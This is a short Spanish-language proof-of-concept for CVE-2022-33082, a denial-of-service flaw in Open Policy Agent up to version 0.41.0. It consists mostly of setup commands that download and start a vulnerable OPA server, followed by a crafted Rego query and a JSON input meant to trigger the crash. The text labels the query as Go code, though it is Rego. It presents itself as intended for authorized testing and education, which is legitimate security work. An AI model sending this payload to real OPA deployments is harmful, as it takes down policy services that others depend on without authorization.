
Prueba de concepto del exploit para CVE-2022-33082 que provoca denegación de servicio en versiones de Open Policy Agent ≤0.41.0 mediante entrada manipulada. Diseñado para pruebas autorizadas y uso educativo.
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
campo de consulta (código Go):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }